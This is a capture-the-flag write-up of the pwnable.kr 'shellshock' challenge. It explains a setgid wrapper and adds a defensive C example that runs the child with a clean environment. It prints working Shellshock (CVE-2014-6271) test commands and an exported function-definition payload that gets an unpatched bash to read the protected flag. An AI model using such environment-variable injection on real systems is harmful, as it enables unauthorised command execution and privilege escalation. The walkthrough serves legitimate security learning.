zacheller@home:~/blog$

pwnable.kr - shellshock


Prompt

Mommy, there was a shocking news about bash. I bet you already know, but let's just make it sure :)

ssh shellshock@pwnable.kr -p2222 (pw:guest)

Analysis

We have an executable called shellshock, its source shellshock.c, and a bash executable.

Let’s check permissions:

shellshock@pwnable:~$ ls -l
total 960
-r-xr-xr-x 1 root shellshock     959120 Oct 12  2014 bash
-r--r----- 1 root shellshock_pwn     47 Oct 12  2014 flag
-r-xr-sr-x 1 root shellshock_pwn   8547 Oct 12  2014 shellshock
-r--r--r-- 1 root root              188 Oct 12  2014 shellshock.c

flag is readable only by root and by members of the group shellshock_pwn. The bash ELF can be read and executed by any user. The shellshock binary can also be read and executed by anyone, and it has the setgid bit set. A setgid executable runs with the privileges of the file's group (here shellshock_pwn) rather than with the group of the user who executes it. So, shellshock can open the flag.

shellshock.c:

#define _GNU_SOURCE     /* glibc needs this for the setresuid/setresgid prototypes (not in the original listing) */
#include <stdio.h>
#include <stdlib.h>     /* system()                            (not in the original listing) */
#include <unistd.h>     /* setresuid(), setresgid(), getegid() (not in the original listing) */
int main(){
        /* getegid() is shellshock_pwn because of the setgid bit; copying it into the
           real and saved IDs keeps the spawned bash from dropping that group */
        setresuid(getegid(), getegid(), getegid());
        setresgid(getegid(), getegid(), getegid());
        system("/home/shellshock/bash -c 'echo shock_me'");
        return 0;
}

setresuid() sets the real user ID, the effective user ID, and the saved set-user-ID of the calling process; setresgid() does the same for the group IDs. getegid() returns the effective group ID of the calling process, which, because the binary is setgid, is shellshock_pwn. Copying that value into the real and saved group IDs as well matters: bash drops an elevated group when the real and effective group IDs differ, so without this the spawned bash would fall back to the caller's group. As it is, the command runs with the group ID shellshock_pwn.
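The root problem in the wrapper above is that system() hands the caller's entire environment, attacker-exported variables included, to a shell. Added example, not the challenge's code: a wrapper that execs the child with a fixed environment instead, and a probe showing that a variable X exported by the caller reaches the shell through system() but not through the clean path. run_clean, CLEAN_ENV and the probe functions are names of my own, and the example assumes a POSIX system with /bin/sh.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/* Environment handed to the child: a fixed PATH and nothing else, so
   nothing the caller exported (X="() { :;}; ...") can reach the shell. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Run `path argv...` with CLEAN_ENV instead of the inherited environment.
   Returns the child's exit status, or -1 on fork/exec/wait failure. */
int run_clean(const char *path, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, CLEAN_ENV);
        _exit(127);                       /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Probe: does the child shell see a variable named X at all?
   Exit status 0 means X is unset in the child, 1 means it leaked through. */
static char *const PROBE[] = { "/bin/sh", "-c", "test -z \"$X\"", NULL };

int x_leaks_via_system(void)
{
    int st = system("/bin/sh -c 'test -z \"$X\"'");
    return st != -1 && WIFEXITED(st) && WEXITSTATUS(st) == 1;
}

int x_leaks_via_run_clean(void)
{
    return run_clean("/bin/sh", PROBE) == 1;
}

int main(void)
{
    /* Stand-in for the attacker's `export X=...` from the write-up (constructed). */
    setenv("X", "() { :;}; echo busted", 1);
    printf("system():    X %s\n", x_leaks_via_system() ? "leaks" : "is hidden");
    printf("run_clean(): X %s\n", x_leaks_via_run_clean() ? "leaks" : "is hidden");
    return 0;
}
```

The same clean-environment rule is what a setgid wrapper should apply whether or not the shell it invokes is patched, since it also removes LD_PRELOAD, IFS and similar variables from the child's view.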

The name of this challenge hints at how to exploit bash to read the flag. See an explanation of the Shellshock bash RCE here. That article explains how to check for the vulnerability:

env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
env X="() { :;} ; echo busted" `which bash` -c "echo completed"

The system's normal /bin/sh is patched, but the bash executable in our home folder is not:

shellshock@pwnable:~$ env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
completed
shellshock@pwnable:~$ env X="() { :;} ; echo busted" ~/bash -c "echo completed"
busted
completed

Since Shellshock makes bash execute whatever trails a function definition it imports from an environment variable, we just need to put our desired command there before bash is run.

Solution

Use CVE-2014-6271 to append our desired command to an otherwise unused environment variable, then run shellshock so that its bash executes it with the group permissions needed to read flag.

shellshock@pwnable:~$ export X="() { :; }; /bin/cat flag;"
shellshock@pwnable:~$ ./shellshock
{flag}
Segmentation fault (core dumped)